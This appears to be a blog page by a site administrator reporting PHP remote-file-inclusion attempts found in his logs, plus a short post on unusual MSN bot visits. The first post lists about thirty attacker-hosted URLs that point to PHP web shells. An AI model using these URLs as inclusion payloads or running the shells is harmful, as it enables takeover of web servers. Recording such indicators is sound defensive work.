19

Nov

PHP include attacks rolling on…

Posted by jerry as Hacking, Security, php, search engine, web site

I’ve written about this a bit, and I’ve started a current attack list on networkstike.com, but the intensity seems to be increasing in these attempts.  I decide to google one of the URL’s that’s included, and right off the bat, I found this article from a web site that’s seeing the same thing.  I believe these attacks are being launched from a botnet, trolling for vulnerable sites to use for some kind of illicit business.

What was really interesting to me in my google search for some of the inclusion URLs is the number of log files that are available and indexed via google.  For a long time, I have gotten many hits with the referral set to a spammy site - an obvious attempt to get some clicks and link mojo with Google.   I never really thought a lot about it, but I can see that it’s probably a fairly effective thing, given the number of log files I found via google.

The current list of php inclusion hits for my sites is below:

http://www.s1ko.jazztel.es/safe.gif?
http://gw-gold.net/dragoc/id.txt?
http://musicgirll.chat.ru/wav/mysong?
http://www.mta.cl/galeria2/galery.txt?
http://www.mta.cl/galeria2/galery.jpg?
http://www.madinaedu.gov.sa/safeon.txt??
http://www.modelismo.alternativo.nom.br//poll/polldata/readme.txt??
http://shellbr.com.sapo.pt/safeon.txt??
http://zamkad.ru/pub/buffer_upload/…/cmd.txt?
http://www.volontaridelrotary2040.com/html/modules/xt_conteudo/NewFile.txt?
http://telkomsex.com/ec.txt?
http://193.109.188.20/0/templates/rhuk_solarflare_ii/css/contr.txt??
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
http://neu.sv-badbentheim.de/hide.txt?
http://www.smartlabphd.com/book/list/skin/zero_vote/images/setup_pages2.gif???
http://www.smartlabphd.com/book/list/skin/zero_vote/images/setup_pages.gif???
http://www.urjb.com/photos/albums/userpics/10001/thumb_blank.gif??
http://www.hgbruce.com/components/com_rsgallery/safeon.txt??
http://tr-igus.com/safe.txt?
http://www.valerieataylor.com/gb/book2.gif??
http://servergazi.com/portal/images/stories/web.gif??
http://hackbsd.net/.xrt/safe.gif?
http://www.freewebtown.com/w8ting/safe.txt??
http://rumusic.chat.ru/rumusic.wav?
http://ninaru.hut2.ru/images/cs.txt?
http://amygirl.land.ru/baby?
http://www.martinschaab.de/php/id.txt?
http://x0.741.com/pb.txt?
http://location-investment.com/Connections/r8.txt?
http://jjisdfiuw834wsdd.chat.ru/js?

I’ve started downloading the files and looking at them.  Many of them are loosly copied off of one another, some are exactly the same.  Some are quite complex, all-in-one shells, that would allow complete server control.  Most of them appear to give some basic information, like directory, available disk space, effetive UID and GID, and the like.

No Comments »
12

Nov

Strange happenings at Microsoft’s Search Engine

Posted by jerry as search engine

So, with all of the looking at logs I’ve been doing lately, I noticed something really unusual.  Visits from hosts in the same range as the normal MSN bot that appears to be downloading whole pages (css, images, etc), which are referred from a search that looks like this:

http://search.live.com/results.aspx?q=myself&mrt=en-us&FORM=LIVSOP

 The keywords keep changing, and they are landing at different sites.  My theory is that MSN is going through an validating the search results for different terms, and analyzing the whole page - probably in an attempt to stop spam.  I suspect that it is running through the entire index of terms that are associated with the site and “viewing” each in turn.

I’m seeing this activity for all of the sites I own and manage.

 This appears to have been going on for about a week now.  Hopefully MSN is on to something that will help reduce the amount of spam in their search results.

No Comments »